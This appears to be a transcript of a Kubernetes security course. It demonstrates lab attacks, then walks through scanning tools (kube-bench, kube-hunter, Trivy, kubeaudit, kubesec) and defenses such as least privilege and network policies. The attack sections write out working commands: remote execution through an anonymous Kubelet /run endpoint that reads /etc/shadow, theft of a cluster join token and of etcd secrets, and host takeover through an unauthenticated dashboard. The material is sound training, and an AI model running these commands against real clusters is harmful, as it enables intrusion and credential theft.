192.168.1.123 -p 10250. This is the default port of Kubelet API. And let's use -sv and see if it gives us anything interesting. Let's hit enter. As you can see, the port 10250 is open, but nmap did not return anything interesting. So let's use curl and see if we can get anything interesting. I'm typing curl -k. This is to specify that we want to make an insecure connection when using SSL, because this port is going to be available over HTTPS. So we are making an insecure connection to avoid any SSL errors. And 1.123:10250/running pods/. If you look at the output, it says the kind is pod list. That means we are seeing the list of pods from the worker node. And if you notice, there are a bunch of names that we can quickly spot that we have used them earlier. If you look at this, this is the image that we had been using in the vulnerable application. And look at this. This is the name of the pod. And this is the container name. And this is the image that we have used. And let's also look for the API pod. Here it is. So this is the pod that is created for running the API microservice. So we have managed to get the list of pods by using this exposed Kubelet API. But this is not what we are interested. We want to get code execution on one of these pods. So let's quickly copy one of these. I'm copying this pod name. And I'm not clearing the screen because we need some of the details from this output. So let's type curl -k. Once again, let's type HTTPS 192.168.1.123:10250. And this time I'm going to use /run, and we need to specify the namespace in which our pods are running. It is the default namespace and our pod name that we have just copied. So I'm pasting it here. And let's add the container name, which is API. If you closely observe the output, all of these details are available there. If you look at this, this is the pod name that we have taken. And here is the namespace. And if you look at this, here is the container. And the name of the container is API. This is how we can obtain all the required details from this output. Now, let's use post method by using the option -x. And the data is going to be cmd equals to whatever the command that we want to execute. Let's quickly do ls and let's hit enter. And look at that. This output is familiar. We have been getting code execution on this particular container, and we were seeing this output every time we got code execution. Now let's try to get something more. I'm replacing this ls with cat/etc/shadow. And look at that. We are able to read the shadow file from the container. As you can see here, we have root access on the container. So similarly, we can get code execution on any container using this technique. And if the container has any misconfigurations, it is possible for us to laterally move through the cluster. Right? So this is how we can achieve remote code execution using an exposed Kubelet API, which allows anonymous authentication. Now let's take a look at some other API endpoints that can be interesting. So I'm clearing my screen. And I'm just changing this to logs. Hit enter. And if you see, there are a bunch of different log files available for us. So this is the list of all of them. We can access any of these log files. What's appearing as interesting to me is this auth.log. So let's try to read the content of that file. Let's hit enter. Look at that. There is some interesting information here. See this. This is the command that a worker node can use to be part of the cluster. So we have gotten access to the token that can be used to join the cluster. This is how this Kubelet API can also expose some interesting information to an attacker. This is how Kubelet API can be dangerous if it is exposed with anonymous authentication enabled. In this video, let's talk about etcd storage. We are also going to see some practical demos of how one can interact with etcd storage API. But before that, let's understand what etcd is and how it is used in Kubernetes. Kubernetes follows distributed architecture. Several machines will be running in the cluster. So it needs a distributed data store, and thus etcd is used for it. The Kubernetes control plane is stored into etcd storage. That means Kubernetes uses etcd to store all its configuration data about the state of the cluster, and metadata. In Kubernetes, it is also possible to create secrets using Kubectl. Now, when Kubectl is used to create secrets, they are going to be stored in etcd in clear text. So let's quickly see a demo of how we can create secrets using Kubectl. I am switching to the master node. Let's first create a file with a secret. So I'm typing echo -n admin@123. This is my secret, and I'm going to write it into a file called secret.txt. Now let's use Kubectl to create a secret from this file. I'm typing Kubectl create secret generic, and let's give it a name called admin password, and let's get the actual password from the file /secret.txt. Okay, so let's hit enter. As you can see, a secret called admin-password has been created, and the actual secret is taken from the secret.txt file. The secret creation is done from a file to avoid any accidental exposure, such as exposing the secret in command history. So now we have created a secret. Now to get it back, we can simply type kubectl get secret. And if you look at this, there are two secrets currently available for us. So let's type kubectl get secret, and let's type the name, which is admin password, and hit enter. And if you look at the output, it is still not showing the actual secret. Once again, this is to avoid accidental leakage. So to see the actual secret, we need to type kubectl get secret, and let's provide the name, and let's type -o and JSON. Now, if you look at the output, still the password is not shown in clear text. This is the password, so we'll have to do a base64 decode of it. Let's clear the screen, and let's type echo, and let's paste it, and let's pipe it to base64 command line utility and use -d to decode it. As you can see, this is the password that we have stored in the secrets. This is how we can use kubectl to create and retrieve secrets. Now let's see how we can access the etcd secrets over the network. This is just to demonstrate how an attacker can abuse if etcd database is misconfigured and exposed over the network. We will use the master node for this demo. So let me first clear the screen. First, we need to have a client to interact with the etcd service. etcd-ctl client can be used for this. So let's switch to the browser and get a download link to etcd-ctl. This is the GitHub page where we can download etcd-ctl from. Let's scroll down, and let's take a copy of this link, and let's use wget, and let's paste it here, and hopefully it will be downloaded. All right, the file is downloaded. Now let me quickly create a new directory called etcd demo, and let's move the file that we have just downloaded into this folder, and let's navigate to this folder etcd demo. Now let's extract the contents of the file. There you go. So now we have extracted the contents. So let's navigate to etcd-v3 folder, and inside this we should see a file called etcd-ctl. I'm just quickly going to copy this into etcd demo directory, and let's navigate back, and here we should see the file etcd-ctl. By default, etcd service is not accessible to us. We will need some authentication material. So we are going to get the authentication material from the master node into this current location. So let's copy the authentication material into the current directory. Sudo cp/etc Kubernetes pki etcd casert, and let's copy it into the current directory. So that's the first file, and the second file is going to be healthcheck-client.crt, and let's just copy this and let's paste it here so that we will have a file with the same name. And one last file that we need is healthcheck-client.key, and let's paste the previously copied file name once again and rename it to healthcheck-client.key. Hit enter. Now let's quickly check the file permissions of all these files. If you look at this, the healthcheck-client.key file is readable and writable only by root. So we are going to quickly change the file permissions for this file. chmod 644 healthcheck-client.key. Now we should be able to read it. Now there is one last thing that we need to do before we interact with the etcd database. That is setting up an environment variable. Let's do export etcd-ctl _API, and let's set it to 3. Okay, so to be able to access this etcd service, now we can use etcd-ctl client and access it using the authentication material that we have. So let's use the etcd-ctl client to do that. Let's type etcd-ctl and let's specify the endpoint of the etcd service, which can be done using -- endpoints, and by specifying the actual IP address and port combo, which is 127.0.0.1:2379. This is where etcd service runs. And let's also pass all the authentication material that we have copied. --casert, and let's pass ca.crt --cert, and let's specify healthcheck-client.crt and --key, and let's specify healthcheck-client.key, and let's type get/ and let's specify a prefix -- keys only. So we are only going to get the list of keys after hitting enter. So if you notice, we have gotten a bunch of keys from the etcd storage. As I mentioned earlier, it stores key value pairs, but we are only retrieving the keys. We can now explore all the keys, and we can come up with the keys of our interest so that we can get the values associated with those keys. Since this list is very long, it is a bit hard for us to drill down the APIs of our interest. So let's make use of grep to do that. So let's pipe this output into grep, and let's look for the key that we have created using kubectl, which is admin-password. We have created it earlier using kubectl. This is the secret that we have created, right? So let's hit enter and see if we can find it in the etcd database. There you go. You are able to find this in the etcd database, right? Let's try to access the path and see if we can get the clear text password. So I'm just changing the command slightly. I'm just removing all of this until the get. And Let's just simply copy this and let's paste it here. All right, now let's hit enter. And if you look at this, this is the admin password. Right, as I mentioned earlier, the passwords are stored in clear text in HCD storage. Now, it is also possible to take a snapshot of the complete HCD database. Let's see how we can do that. Let's clear the screen and let's slightly change the command. So instead of get, let's type snapshot and save. And let's give the path of the current directory, which is hcd-demo/hcd.db. This is where the snapshot is going to be saved. Let's hit enter. And looks like the snapshot is saved at the directory that we have specified. And let's just type strings hcd.db and let's grep for admin at 123. This is the secret that we have stored into the HCD database. So we want to see if it is available in the snapshot that we have saved. Let's hit enter. There you go. As you can see here, the HCD database contains the password that we have stored earlier. This is how we can interact with the HCD database service if at all it is misconfigured or exposed over the network. Another possibility is that if you get access to the snapshot of HCD database, we can explore the snapshot to see if there is anything interesting.
Welcome back to another video. In this video, we are going to discuss some attacks against exposed Kubernetes dashboards. Kubernetes dashboard is a web-based graphical user interface. Like we did with Kubectl, we can use this dashboard to deploy applications into the cluster. We can use this to troubleshoot the containers that we deploy to the cluster. We can even manage the cluster resources using this dashboard. So dashboard contains a lot of powerful features, and this is going to be a very easy entry point if it is not well hardened. It should be noted that Kubernetes dashboard is not deployed by default with a Kubernetes installation. We need to explicitly deploy it. So we are going to deploy a Kubernetes dashboard into our cluster, and we are going to make some configurations in a way that it is going to be exposed over the network and no authentication is needed to access the dashboard. While this may look funny to make a setup intentionally vulnerable, but there were instances on the internet where this vulnerable setup existed and attackers compromised them. One such instance that is worth mentioning is Tesla's Kubernetes hack. Let me quickly show you a blog post detailing what happened with Tesla's Kubernetes hack. If you look at this blog post, it explains how the Tesla attack happened, and if you look at the details, there are two things that might have gone wrong. First, the Kubernetes dashboard had elevated privileges on the cluster. Second, Kubernetes dashboard was exposed to the internet. This is exactly going to be the setup that we are going to create now in our lab. In addition to these two things, we are also going to disable authentication. Alright, let's switch back to the presentation. Well, now we are going to switch to the master node and we are going to deploy a Kubernetes dashboard. Before that, let's remember that a service account is going to be tagged to the dashboard and it has to be configured as well. So we are going to do two things. One, deploy the dashboard and give some privileges to the service account. With that, let's first get the YAML file that can be used to deploy the dashboard into our Kubernetes cluster. This YAML file is available on the GitHub page of Kubernetes. So let's go ahead and grab the URL of the YAML file. I'm switching to the browser once again. And let's copy the URL. Now let's switch to the master node and let's create a new directory called dashboard. Let's navigate to dashboard and let's use curl to download the YAML file. and let's use -O so that the file will be saved onto the disk. Now the file should have been saved. Let's quickly check it. As you can see, there is a new file called recommended.yaml. Now we don't want to use this file directly to create the dashboard. We want to make some changes. There are two changes that we want to make to this file. One, we want to disable authentication, and we want to expose the service over the external interfaces of the master node as well as the worker node, right? So let's quickly open this file using gedit. And let's look for the word deployment. Here it is. As you can see, we have found the word deployment here. Now let me slightly scroll down so you can see what changes I am making here. Under the spec, we have containers and it has some arguments. For instance, we are creating this container using this image, which is Kubernetes UI/dashboard, and the version is v2, right? Similarly, it has some arguments specified. Now I'm going to add two more additional arguments to disable authentication. Let's first add --enable skip login, and let's also add disable settings -authorizer. There is a typo. Let me quickly fix it. There it is. So we have added these two entries so that the authentication will be bypassed. Now we want to make another change, which is going to expose this service over the network. So let's find out the kind service. Here it is. As you can see, we have found the service here. Now under spec, let's quickly add some entries. First, let's add type, and let's call it node port, and let's add some external IPs. (192.168.1.127) and 192.168.1.123. So these are the IP addresses of the master node and the worker node. So we are exposing this service by specifying these two IP addresses as the external IPs. So anyone who can reach these IP addresses will be able to access the dashboard. So let's save the file and let's quickly do a kubectl apply -f recommended.yaml. As you can see, there are no errors and everything looks fine. Now let's switch to the Kali machine and see if this dashboard is accessible. Let's type the IP address of the master node, 192.168.1.127. There is a certificate warning. Let's just go to advanced and click accept the risk and continue. All right, so if you look at this, looks like the dashboard is exposed, but there is nothing to display here. We are unable to see anything. That's because we did not assign any role to the service account associated with this dashboard. So let's go back to the master node and do that. First, we need to identify the name of the service account. So let me once again quickly open the YAML file and let's find out the name of the service. As you can see here, the kind is service and the name of the service is Kubernetes-dashboard and the namespace is also Kubernetes-dashboard. So let's go back and create a cluster role binding by assigning this service account cluster admin privileges. I'm saving this file. And now let's use kubectl create cluster role binding and let's give it some name. Let's call it dashboard test and specify the option cluster role and give it cluster admin privileges. And let's also specify the service account that we want to use here. In this case, it is Kubernetes dashboard. But for that, we first need to specify the namespace. So the namespace is also Kubernetes dashboard followed by the service account name, which is basically the same. Alright, with this, we should be able to create a new cluster role binding, which gives our service account cluster admin privileges. So let's hit enter. As you can see, a cluster role binding called dashboard test has been created. Right, now let's quickly go back to the Kali machine once again and see if we can see anything extra. Look at that, the page is automatically refreshed and we are able to see some interesting information here. We can see the workloads under the namespace default. We can also change the namespace to something else. For instance, let's change it to Kubernetes dashboard and let's see what's inside it. If you look at this, there are two containers running here: dashboard metrics scraper, dashboard Kubernetes dashboard. Right, let's go back to the default namespace. And if you look at this, there are two deployments here. The first one is API and the second one is web app. Now, if you slightly scroll down, you can also see the pods that we have created. If you remember, each of these deployments have created two pods. So we can see that there are two pods under API here, and we can also see two pods under web app. It is possible for us to interact with these pods just by clicking on these three icons and going to exec. Look at that, we have gotten a shell on the container. Now we can execute anything. Let's try our good old ls. And look at that, this should be familiar to you. These are the files from the API microservice. So this confirms that we are able to execute commands on the pods. Now, like we did earlier using our other attacks, let's try to do a full cluster compromise using this dashboard. So what I'm going to do is I'm going to get my malicious YAML file and I'm going to create a pod by using this dashboard. So let's first get the YAML file from the master node. Let's navigate to desktop, downloadables, and inside this directory we should have a file called malicious.yaml. So I'm just quickly going to copy this and let's go back to the Kali machine and look at this option. There is an option for creating a new resource. So I'm clicking on this plus icon and we can write some YAML content here. So let's paste the content that we have copied from the master node from the malicious.yaml file. Here it is, and let's click upload. And once this is done, let's quickly scroll down. And look at that, a new pod has been created. Now we can interact with this. Let's once again click on these three dots and click exec. And we have gotten a shell once again. And now this time, let's type ls and let's also type ls/attacker/etc/shadow and see if there is anything. Yes, there is a shadow file. This means we managed to get access to the underlying host because using the malicious.yaml file, we mounted a path from the underlying host onto the container and we are trying to access that now. So let's type cat/attacker/etc/shadow and hit enter. There you go. If you notice this, we have gotten root access on the underlying host, which is the worker node. Like we did earlier, we can also force the pod creation on the master node, and thus it is possible to achieve full cluster compromise even using this exposed dashboard. So as you can see, this exposed dashboard is pretty easy to use and it is so powerful because we have given it cluster admin privileges. Typically, administrators want to use this dashboard to manage things So you can always expect to have some privileged service account tagged to this dashboard. So this is how a dashboard can be exposed over the network and it can be abused by an attacker.
Welcome to the module Automated Assessments. In this module, we are going to discuss some tools and techniques that can be helpful in spotting security misconfigurations and vulnerabilities in our clusters. We are going to see a bunch of different tools like Kubebench, KubeHunter, Trivy, Kubeaudit, and Kubesec. Some of these tools can do a full scan of your cluster. Some of them can be used to scan the YAML files, and some of them can be used to check vulnerabilities in the Docker images. So we are going to see how to use these tools to automatically spot vulnerabilities and misconfigurations in our clusters in the next couple of videos. So let's get started. Hello and welcome back to another video. In this video, we are going to discuss a tool called Kubebench. This is a free and open source tool developed by Aqua Security, and it is written in Go language. This is a fantastic tool if we are looking at auditing our clusters for best practices, because this tool checks whether our Kubernetes is deployed according to the security best practices as defined in the CIS Kubernetes benchmark. So let's quickly jump into the master node and see how we can run Kubebench to audit the cluster. I'm switching to my master node. I'm making a new directory called Kubebench. And I'm navigating there. Now, let's download Kubebench binary. We can download Kubebench binary using a Docker container. So let's do that. I'm typing sudo docker run --rm -v, and let's specify the present working directory as the volume to be mounted from the host, and let's mount it into a directory called /host inside the container, and let's pull the image to be able to run it. So aquasec /kubebench, and let's specify the tag as latest, and let's provide the command install, and let's hit enter. As you can see the message, it says Kubebench is now installed on your host. So let's quickly check if Kubebench is downloaded. There you go. Now we can simply run Kubebench by typing sudo /kube-bench. Now before running this, let me quickly show you two misconfigurations that we have made earlier. The first one is going to be on the master node. If you remember, we have exposed the API server by using an insecure port. So let me quickly show you gedit /etc /Kubernetes /manifests /kube-API server.yaml. Let's hit enter and let's scroll down. And if you look at this, this is the change that we have made earlier. We have enabled insecure port, which is 8080, and we have also set insecure bind address to 0.0.0.0. This is how we have exposed API server. So let's quickly close this, and let me also show you the worker node for the Kubelet API misconfiguration. Let's type sudo gedit var lib kubelet and config.yaml. If you remember, we have enabled anonymous authentication on Kubelet API, which is running on the worker node, and we have also set the authorization mode to always allow. Right? So these are the two misconfigurations that we have made earlier. I just wanted to make sure that you remember this before we run kubebench. So let's switch to the master node and run kubebench. I'm typing sudo /kubebench. Let's hit enter. And let's see what it has found on both the master node as well as the worker node. So if you look at this output at the bottom, this is the output for the worker node, where there are 15 checks which are passed and there are 8 checks that are failed. As I said, this summary is associated with the worker node. So let's scroll up and see the summary associated with the master node as well. If you look at this, there are 44 checks which are passed and there are 24 checks that are failed. So let's quickly take a look at some of the findings from the master node. So if you look at this, the first one is a fail, which says anonymous authentication is not set to false on the API server. So that is one finding. And there is another interesting finding. If you remember, we have changed insecure bind address and insecure port, and this is flagged. So we will have to make sure that insecure port and insecure bind address are changed as suggested here. The insecure port should be set to 0 and the insecure bind address should not be set at all. So this is how Kubebench suggests us with some common misconfigurations. If you look at this, it is suggesting us to set a admission control plugin called always pull images. If you observed our YAML files which were created for deploying the vulnerable application, this flag is set inside those YAML files. However, this is flagged because the recommendation here is to set an admission control. Admission control is an additional layer of security in a Kubernetes cluster. We are going to discuss about admission control in the next module. For now, let's remember that admission controls can be used to apply security controls at cluster level instead of pod level. Okay, so another one that it is suggesting us is to set another admission control plugin called deny escalating exec and security context deny. Now, what I'm interested in is this one. If you look at this, this is also a failed case where we are suggested to set an admission control plugin called pod security policy. We are going to discuss about pod security policies in the next module, but remember, pod security policy is one admission control, which means it can be applied to enforce restrictions at cluster level. Now, these are some of the findings from the master node. Now let's take a look at some of the findings from the worker node as well. So I'm scrolling down. If you notice, Kubebench also provides us with the recommendations. As you can see here, it tells us that this is the file that we need to open and we will have to change this entry inside the file. This is pretty good, right? So similarly, the insecure bind address can be changed from the same file. We know this, we have set it up earlier. Right now, let's scroll down and let's quickly take a look at some of the findings from the worker node. All right, so these are the findings from the worker node. I see there are some false negatives in this case because we have made some changes to the Kubelet API, but Kubebench unfortunately did not flag them. Anonymous auth is actually set to true, but this is not flagged here. And authorization mode is set to always allow, and it is not flagged as well. This is how we can use Kubebench for auditing our Kubernetes clusters. Welcome back to another video. In this video, we are going to discuss another tool called KubeHunter. This is once again a tool from Aqua Security, and this is also free and open source. This tool also can be used to hunt for security weaknesses in Kubernetes clusters. The GitHub link is available on the screen here, so you can just take a look at the KubeHunter's GitHub page to better understand the tool. But I'm going to show you a quick demonstration of how we can use KubeHunter to scan our cluster. The GitHub page of KubeHunter provides all the instructions that we need to know to run KubeHunter. It is pretty straightforward to use. So let's go to the GitHub page of KubeHunter and see how we can use this tool. I am switching to the GitHub page and let's scroll down. As you can see, there are 3 methods available for deploying KubeHunter. The first method is to use it on the machine itself. We can do that. It is possible to install KubeHunter using pip. Another way is to use KubeHunter container. And this is what I'm going to do now. I'm going to go with the container option. So I'm just copying this command here and let's paste it in the master node. We will have to slightly change this CIDR value. Here we are going to specify 192.168.1.0/24. So that's the network we want to scan. So let's hit enter and let the KubeHunter image download and scan the cluster. I'm hitting enter. We need to run Docker as sudo here. So let's add sudo and hit enter. Once again, the image is not available locally, so we are pulling it first from Docker Hub. The scan has been completed. Now look at the output. KubeHunter has reported some interesting vulnerabilities. The first one is on port 10250. If you remember, we exploited this misconfiguration by exposing Kubelet API over the network. So that is spotted by KubeHunter. That's interesting. And there seems to be some information disclosure vulnerability that we did not come across. So that is interesting to know. So let's try to access this and see if we can see the version of Kubernetes. I'm opening my browser and let's add /version, hit enter. Seems like we are missing HTTPS. Let's accept the warning. And that seems to be a valid finding as well. All right, so let's go back to the output and let's scroll up and see if there is anything else that is interesting. These are the services detected. Kubelet API is running on port 10250 and the API server is also running, and there are 2 nodes found here. Overall, I am pretty happy with the output. KubeHunter has spotted a critical vulnerability, which is remote code execution through exposed Kubelet API. So this is how we can use KubeHunter to find misconfigurations and vulnerabilities in our clusters. Welcome back to another video in Automated Security Assessments module. In this video, we are going to discuss another tool called Trivy. Once again, this tool is from Aqua Security and it is free and open source. Aqua Security is really doing some great job releasing these tools and making them free and open source. A big thumbs up to them. Now, coming back to the tool, simply it's a vulnerability scanner for containers. If you want to check if your Docker image has any publicly known vulnerabilities, you can just scan it using Trivy. This tool also fits well in CI/CD environments, so we can trigger automated scans of Docker images in CI/CD pipelines. I always had bad experiences with tools that do vulnerability scans of Docker images. That's because most of the tools that I have used are pretty hard to set up and use. Fortunately, Trivy is pretty easy to use, and they have also made a Docker image available for us. So we can just simply run this Trivy from a Docker container. So let's go to the GitHub page of Trivy and see how we can run it from a container. This is the GitHub page. Let's scroll down. There are multiple ways we can run this, but I'm going to go with the container option. I'm copying this command and I'm going back to my master node. Before we run Trivy's Docker container, let's make a new directory called Trivy and let's navigate there. And now let's paste the command that we have copied from the GitHub page. Here it is. Now we need to make two changes to this command. One, we have to specify the name of the image that we want to scan, and we will also have to specify the cache directory. I'm specifying the present working directory as my cache directory, and I'm going to change the image name to something that's from Docker Hub. Let's open Docker Hub. Here it is. And let's search for an image called Shell Shock. And this seems to have some reasonable amount of downloads, 10K plus. So let's click this. And let's look for tags. And I'm going to go with this one. So I'm just copying the image name along with the tag. And let's go back to the master node. And let's paste it here. And let's hit enter. Once again, the permission denied. So let's just quickly add sudo and run the command. Let's hit enter. The DB is getting updated before the scan starts. And there you go. The scan is completed and looks like there are a bunch of vulnerabilities reported. As you can see, the output shows the risk and the vulnerable component in question along with the CV numbers. So that's interesting. So let's quickly scroll up and see what is the base image that is used here. Looks like this is Ubuntu 12.10, and Trivy clearly shows a warning that this OS version is no longer supported by the distribution. Ubuntu 12.10 is no longer supported, so the vulnerability detection may be insufficient. Right, so this is how Trivy can be used to scan for vulnerabilities in the base images, and obviously this output is too big, and obviously we will have to manually analyze and prioritize what we want to patch. Right, so this is how we can use Trivy to scan Docker containers. Welcome back to another video. In this video, we are going to discuss another interesting tool called Kube Audit. This Kube Audit is a free and open source tool from Shopify. This is another interesting tool that I commonly use to scan YAML files. This tool also helps us to audit our Kubernetes clusters against common security controls, and I prefer to use this tool to scan the YAML files. So let's quickly open the GitHub page of Kube Audit. Here it is. So let's quickly go to releases and let's go to Linux AMD 64 and let's copy the link address and let's switch to the master node. And now let's create a directory called Kube Audit. Let's navigate there and let's type wget and paste the link that we have copied. Hit enter. As you can see, the file has been downloaded. Now let me quickly open the file explorer to extract the binary. This is the file that we have just downloaded. Let's give a right click and open with Archive Manager so that it will be extracted. There it is. The file has been extracted and we can see a new file called Kube Audit in the current directory. As we can see in the current directory, there is a new file called Kube Audit. Let's quickly run /kube audit -h to see the help. If you look at the flags, there are a lot of different options that we can use with Kube Audit. I'm not going to go through every single option that this tool has, but what I'm going to show you is I'm going to scan a YAML file with excessive privileges and see what Kube Audit shows us. So I'm just going to clear the screen and type /kube audit desktop downloadables and malicious.yaml. So this is the YAML file that we have been using to deploy a malicious pod in the cluster. Now let's see if Kubeaudit spots anything. We will have to specify the flag -f so that this file will be loaded. And we also want to specify the option all so that all the checks will be performed. So I'm just hitting enter and look at the output. Interestingly, there are multiple issues spotted by Kubeaudit. We can see that read-only root file system is not set, run as non-root is not set, and default service account with token is mounted, and privileged flag is set to true, and a lot of dangerous capabilities are not dropped. So when an attacker gains access to this container, it is possible for him to escape from the container and gain access to the underlying host. Similarly, there are no Apparmor or Seccomp profiles available within the Docker container. So these are all some of the interesting recommendations that are given by this Kubeaudit tool. In the next section of the course, we are going to discuss a concept called container security context. When we discuss that topic, we are going to see how we can fix some of the issues that are spotted here. Right, so that's all for this video. In the next video, we are going to discuss another tool called Kubesec. Welcome back to another video. In this video, we are going to discuss another tool called Kubesec. This is another interesting tool which can be used for static analysis of YAML files. This tool is also available in multiple varieties like binary, Docker image, source, etc. And as usual, we are going to use Docker image in this video. To use this tool, we will have to get the latest Docker image by using a specific tag which can be found on the Docker Hub URL that is given on the slide. So let's copy this. And let's open it up in a browser. I'm pasting it here. And as you can see, this is the latest tag of Kubesec image. So this is something that we need to run Kubesec Docker container. Now let's switch to the master node. Let's navigate to desktop and downloadables, because this is where we have malicious.yaml file and we want to do static analysis on this file using Kubesec. So I'm just clearing the screen. Let's run sudo docker run -i kubesec/kubesec, and let's get the tag of the latest image from Docker Hub. I'm copying this here and let's paste it here. There you go. And now let's type scan/dev/stdin and let's provide malicious.yaml as the input file. And let's hit enter. There you go. In my case, I have already run this scan earlier, so it was much faster. But in your case, the image will first be downloaded and then the scan will be performed. So let's quickly go through the output. Once again, this output pretty much looks like what we have seen from Kubeaudit. The first one shows that privileged flag is set to true. That's the only critical finding, and the remaining are advices. So the first one shows that Apparmor policies are not provided, and the next one shows something about service accounts, and after that the next entry is suggesting us to have some Seccomp profiles, and it also shows that enforcing CPU limits can prevent DOS attacks so that attackers won't be able to consume all the CPU power from the container. I'm skipping some of these and I'll probably go to the security context once. As you can see here, Kubesec is suggesting us to reduce some kernel capabilities available to a container. So this is once again the same as what we have seen with Kubeaudit. We are essentially getting a recommendation that we should drop all the unnecessary capabilities, right? This is how we can use Kubesec as a tool for static analysis. Now, it may not be needed to run all the tools that I have shown you in the module, but the idea is to give you more options so you can get an experience of multiple tools and choose what you like. Welcome to the module Defenses. In this module, we are going to discuss a bunch of defense techniques as well as some best practices. We will begin with discussing why it is important to limit the network exposure of critical services, and we will discuss about some authorization concepts, and we will talk about what kind of privileges should be given to service accounts, and we will talk about admission controllers, and we will talk about secrets management, and finally we are going to discuss network policies and security context. We already had some hands-on exercises on some of these concepts. For instance, let's talk about network exposure. We have seen how a service like API server or Kubelet API can be exposed. And we have had some hands-on exercises on role-based access controls. So that falls under authorization. And we have seen how service accounts can be created and used. So that falls under service accounts. So we are not going to have hands-on exercises for all of these concepts in this section, but we are going to have some very good hands-on exercises on network policies and security context. So let's get started with discussing these concepts in the next video. Welcome back. Let's talk about limiting network exposure. We have seen how dangerous it is if some of the critical services in a Kubernetes cluster are exposed to a malicious actor. For instance, we have seen API server, we have seen Kubelet API, we have seen Kubernetes dashboard. When these services were exposed, full cluster was compromised by a malicious actor. To prevent such scenarios, it is extremely important that we limit who can access these services. For instance, if API server needs to be exposed to a third-party service, it is important that appropriate authentication is set up. For instance, certificates must be used to ensure that the client which is contacting the API server and the API server are mutually authenticated. And it is also important that these services are not exposed over the internet. So as we have seen in the attacks module, some of the services of concern are API server, Kubelet API, Kubernetes dashboard, and etcd. These are some of the services that we should consider protecting from network exposure. If they are really required to be exposed over network, appropriate authentication controls should be enforced. The link provided here is a very good reference from Kubernetes documentation. It provides various authentication strategies that we can follow. I'm not going to dive deep into these authentication concepts, but I would recommend you to read the documentation available in this URL. That is all I wanted to discuss in this video. In the next video, we are going to talk about authorization. Welcome back to another video. Kubernetes supports 4 different authorization modes: node, attribute-based access controls, role-based access controls, and webhook. Once again, Kubernetes documentation available at this URL provides a great amount of information about the authorization modes available in Kubernetes. Now, what I wanted to talk about is the role-based access controls. We have discussed about role-based access controls in great detail when we wanted to misconfigure the cluster. Once again, let's have a quick recap of what we have learned under role-based access controls. Role-based access controls are comprised of 4 layers: roles and role bindings, cluster roles and cluster role bindings. If you remember, roles and role bindings are specific to a namespace. That means if a role is assigned to a service account that is available in namespace 1, this service account cannot access anything in namespace 2. This is one of the ways we can limit what a specific user can access within the cluster. In this case, we are limiting the service account to be able to do things only within namespace 1. If you give that service account a cluster role, then it becomes overprivileged and it will be able to access anything in any namespace. This is where role-based access controls play a very important role. We will have to always make sure that appropriate roles are given to users. When we talk about users in Kubernetes, in most of the cases, we are talking about service accounts. That's because the authentication of human users should be taken care outside of the cluster. For example, by using things like single sign-on. Similarly, when it comes to authorization, we are talking about service accounts. Apart from that, we have also used subjects, resources, and verbs when creating roles and tagging them to our service account. Now, it should be noted that if a user is given privileges to create pods, it is highly likely that it can cause privilege escalation attacks. Let me show you a quick snippet from Kubernetes documentation. I have taken this from Kubernetes documentation, and it says users who have the ability to create pods in a namespace can potentially escalate their privileges within that namespace. They can create pods that access their privileges within that namespace. This is the feature that we have used when we wanted to get access to the host machine from within the pod. That was done by misconfiguring the cluster with a service account that has excessive privileges. Now, that brings us to the discussion about service accounts. As I mentioned, we have misconfigured the cluster by creating an overprivileged service account. And when a service account is created in Kubernetes cluster, an authentication token will be created for the service account. And the token associated with that service account will be injected into the pod that is running within the same namespace. Now that's what exactly we have abused when we got access to a pod using a remote code execution vulnerability. A service account was created and mounted into the pod, and we got access to that pod, and we managed to use that service account to create another pod which was malicious, and we managed to escalate our privileges to gain access to the underlying host, and eventually we gained access to the master node. Now, this is the reason why principle of least privilege has to be applied when we create service accounts. We should give them the least privileges possible. If a service account requires to list pods, just give it a privilege to list pods, nothing more than that. Granting unnecessary privileges is going to be very risky, and we have already seen a great demonstration of why that is dangerous. Secrets management is another concept that is extremely important when we talk about Kubernetes security. Applications that are running inside the containers may need access to secrets in many cases. They may want to talk to a database, or they may want to talk to another service which requires authentication. In such scenarios, there should be a way these applications get these required secrets. That means the secrets should be accessible to the pods in which the applications are running. Usually, these secrets are passed using environment variables and mountable volumes. As we have seen earlier, Kubernetes also offers etcd to store the secrets. However, we have seen that etcd stores secrets in clear text and it presents it in base64 encoded format. We do not want to save sensitive data in clear text. We must ensure that they are encrypted when they are at rest. This is where secrets management becomes important. We can use a third-party tool like HashiCorp Vault to manage the secrets for us. Regardless of what product we use, we want to make sure that the data at rest is encrypted, and when the secrets are in transit, they have to be transferred in a secure tunnel. And when anyone wants to access the stored secrets, we should ensure that they are authorized to access the secrets. This can be accomplished by using things like tokens. Now, what if the token that is used to access the secrets is compromised? And that's where we want to minimize the risk. So we need to use token rotation. Even if a token is compromised, by rotating the tokens, we are ensuring that the compromised token is no longer usable, or it is usable only for a limited amount of time. These are some of the considerations that we want to take into account when dealing with secrets. Welcome back. Let's talk about admission controllers. Admission controllers provide an additional layer of access controls in a Kubernetes cluster. To enforce admission controllers in our cluster, we can make use of various different plugins that are available, which can govern and enforce how the cluster is used. Essentially, these admission controller plugins act as a gatekeeper that intercept API requests and may change the request object or deny the request altogether, but only after the request is authenticated and authorized. So that means when a specific API request is made, first it will be authenticated. If successful, it will go through authorization. And if the request passes authorization, then the admission controller will comes into picture if it is enforced. Let's take an example to better understand this. Let's assume that we have enforced an admission controller called pod security policy. Now, pod security policy comes up with a lot of different options in which we can specify the options for a pod. For instance, we do not want to create a privileged pod, so we can specify that in pod security policy. Let's take the same example. Let's assume that we have enforced a pod security policy admission controller in which we have specified that we don't want to create any privileged pods in this cluster. Now, if there is an API request from a user to create a privileged pod, even if the request is authenticated and authorized, when admission controller is triggered, it will deny the request because pod security policy says that we cannot create privileged pods in this cluster. So essentially, it acts as an additional layer of security control. Another example of an admission control plugin is always pull images. Now let's assume that we have created a pod and the image used to create this pod has some vulnerability or it is backdoored. Now for the next time when we create a pod, this backdoored image will be replaced with the image that we pull from the registry. Even though this creates an additional overhead on the performance, it is good to have this kind of plugins to maintain good hygiene in the cluster. This is how admission controllers work. To recap, admission controllers provide an additional layer of access controls and they work at cluster level. We are going to have some hands-on exercises of pod security policy equivalents, but at pod level instead of doing it at cluster level. Welcome back to another video. In this video, we are going to discuss about network policies. Before we understand what network policies are, let's understand the need for network policies. If you remember, we have exploited a remote code execution vulnerability in the vulnerable application, and we have gotten a reverse shell by executing a netcat command on the container where the vulnerable API is running. If we can set up a network rule on the pod to block all the outbound connections, the reverse shell may not be possible even if the application is vulnerable. That's exactly what we can do using network policies. Using network policies, it is possible to apply ingress and egress rules on our pods. While this is not going to fix the vulnerability 